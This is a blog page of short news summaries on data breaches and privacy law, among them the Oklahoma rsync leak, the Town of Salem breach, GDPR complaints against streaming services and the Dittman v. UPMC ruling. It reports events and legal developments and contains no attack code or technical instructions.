Oklahoma Government Suffers Massive Data Leak

Another massive data leak has been discovered.

This latest leak involves an open Oklahoma Department of Securities storage server exposing millions of records, including confidential files linked to FBI investigations, 17 years of email archives and thousands of Social Security numbers.

The breach was discovered by a researcher from cybersecurity specialist UpGuard, while scanning the web with Shodan, a search engine that lets the user find specific types of devices (webcams, routers, servers, etc.) connected to the internet using a variety of filters.

The data was exposed through an unsecured rsync service, a utility for synchronizing files across computer systems. With the IP address, registered to the Oklahoma Office of Management and Enterprise Services, anyone could download the publicly accessible files stored on the server. Continue reading Oklahoma Government Suffers Massive Data Leak

GDPR Complaints Filed Against Netflix & Amazon

GDPR Complaints Filed Against Netflix & Amazon

Video steaming leaders including Netflix, Amazon, and Apple have been accused of breaking the EU’s data regulations.

General Data Protection Regulation (GDPR) rules mandate EU individuals have the right to access a copy of the personal data companies collect about them through the regulation’s right of access. However, Max Schrems’ privacy group NOYB (None Of Your Business) has said it found that most of the big streaming companies have not fully complied and has filed formal complaints – which, if upheld, could result in substantial fines for the streaming giants.

Lack of Compliance

After GDPR went into effect in May 2018, many of the biggest names in tech including Amazon, Apple, Google and Spotify began allowing customers to download a copy of their data. NOYB, however, has said it found many of these streaming industry leaders did not do enough to comply with the new law. Continue reading GDPR Complaints Filed Against Netflix & Amazon

Australian Parliament Hacked!

Australian Parliament Hacked!

Australia’s parliament had to reset and change its computer network passwords after an unknown hacker tried to infiltrate and bypass its systems, according to a Reuter’s report.

As stated in the report, both Tony Smith, the speaker of the lower House of Representatives, and Scott Ryan, president of the upper house Senate, said there’s no evidence that any data had been accessed or stolen.

No Stolen Data

“We have no evidence that this is an attempt to influence the outcome of parliamentary processes or to disrupt or influence electoral or political processes,” Smith and Ryan responded in a joint statement.

“Accurate attribution of a cyber incident takes time and investigations are being undertaken in conjunction with the relevant security agencies.” Continue reading Australian Parliament Hacked!

Canada’s New Consent Guidelines are Effective Now!

Consent is an important element in privacy law.

Last year, Canadian officials jointly issued guidelines on how to obtain meaningful consent under Canada’s Personal Information Protection and Electronic Documents Act (PIPEDA) which generally requires that you obtain meaningful consent for the collection, use and disclosure of personal information.

The guidelines outline seven principles for obtaining meaningful consent.

  1. Emphasize key elements

Organizations must allow individuals to quickly and easily review key elements affecting their privacy decisions early in the process. Key elements include what information is being collected, why it is being collected and who it is shared with. Continue reading Canada’s New Consent Guidelines are Effective Now!

Massachusetts Adds New Requirements to Breach Notification Law

Massachusetts Governor Charlie Baker recently signed a new law that amends the state’s data breach notification law.

“The improvements made to Massachusetts laws in this legislation are necessary to protect consumers from the consequences of data breaches that could expose personal information and to give consumers more control over their data and how it is used,” Governor Baker tweeted.

Key New Provisions include: Continue reading Massachusetts Adds New Requirements to Breach Notification Law

Popular Online Game ‘Town of Salem’ Suffers Data Breach Exposing 7.6 Million Players

A data breach at BlankMediaGames (BMG) has affected more than 7.6 million players of Town of Salem, a browser-based online role-playing game.

The Discovery

The incident was disclosed on December 28 to cybersecurity company DeHashed, which received an anonymous email containing evidence of server and database access.

DeHashed says affected data includes usernames, emails, passwords, IP addresses, game and forum activity, and payment information. Some users who paid for features also had billing data compromised.

The Breach

The attackers used a Local File Execution/Remote File Execution (LFI/RFI) attack that injects malicious code into a web server running PHP, DeHashed said.

The attackers then gained unauthorized access to the complete gamer database which contained 7,633,234 unique email addresses (most were Gmail, Hotmail, and Yahoo.com email accounts).

BMG’s Response

A BlankMediaGames developer named Achilles responded on the Town of Salem forums that no credit-card numbers were stolen. Further, Achilles wrote, all passwords were hashed and not stored in plain text.

“The only important data compromised would be your Username/hashed password, IP and email,” Achilles wrote. “Everything else is just game related data.”

Moving Forward

Data is becoming a much larger issue for game developers; just last month, Bethesda Game Studios came under fire for a bug that leaked player information from support tickets.

If you’ve played Town of Salem, you should change your password immediately.

 

German Hacker Uses Twitter to Leak Personal Data of German Politicians

A 20-year-old hacker has been using Twitter to leak private details belonging to hundreds of German politicians, celebrities and public figures, including German Chancellor Angela Merkel.

The Twitter Dump

Over several weeks last December, a Twitter account run by an individual calling themselves “G0d”, later identified as a 20-year-old German student,  posted links to the sensitive information, which included email addresses, phone numbers, and personal chats. The data dump was finally noticed by a German publican on January 3rd.

The account, which was quickly shut down, had more than 18,000 followers and described its activities as “security researching” and “satire and irony”. Google and Bitly also pulled the plug on the blogs and links the hacker had used to host files containing the information. Continue reading German Hacker Uses Twitter to Leak Personal Data of German Politicians

A Data Breach Can Cost a Small Business $2.5 Million

SMBs are attractive targets to cybercriminals because they typically have smaller cybersecurity budgets and may lack an internal security team dedicated to timely discovering and responding to cyberattacks. Critically, these organizations may also lack resources to train their employees to identify preventable breaches like phishing campaigns.

The Cisco Report

Late last year, Cisco published a special cybersecurity report (Cisco’s SMB Cybersecurity Report)(Report) focused how cyberattacks affect SMBs. The Report includes 1,816 survey respondents from 26 countries.

When surveyed, respondents listed these as the most concerning threats.

  • Targeted employee attacks (BEC and phishing)
  • Advanced persistent threats (new malware)
  • Ransomware

Continue reading A Data Breach Can Cost a Small Business $2.5 Million

Employers Have a Legal Duty to Protect Employee Data

The cybersecurity standard of care is getting clearer: if you collect sensitive data, you must take reasonable measures to protect it.

Recently, in Dittman v. UPMC, the Pennsylvania Supreme Court ruled that an employer has a common law duty to use reasonable care to safeguard its employees’ personal information stored on an internet-accessible computer. This decision paves the way for a much broader application because the case was decided based on the mere act of collecting and storing sensitive information (and not the employer/employee context).

The Facts

The case relates to a data breach of the University of Pittsburgh Medical Center’s (UPMC) network and the theft of sensitive personal information belonging to more than 60,000 employees (e.g., Social Security numbers, confidential tax information, and bank account information). The employees sued but lost in the trial court, which held that Pennsylvania law did not recognize a duty to secure employee data stored on internet-accessible computers. Continue reading Employers Have a Legal Duty to Protect Employee Data

HHS Publishes Cybersecurity Best Practice Guide

The U.S. Department of Health and Human Services (HHS) recently published voluntary cybersecurity best practices entitled “Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients” (Best Practice Guide). These best practices were compiled over a two-year period by 150 cybersecurity and healthcare experts from both the public and private sector and are a cybersecurity roadmap for healthcare organizations of all types and sizes, from small local clinics to large regional hospital systems.

All entities, especially those in the healthcare field, can learn from this valuable resource.

The Four-Part Best Practice Guide

The Best Practice Guide is four sections: a main document (entitled Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients); two technical volumes; and resources and templates. The Best Practice Guide’s goal is to increase awareness, provide sound practices, and consistently mitigate today’s most damaging cybersecurity threats in the healthcare industry. Continue reading HHS Publishes Cybersecurity Best Practice Guide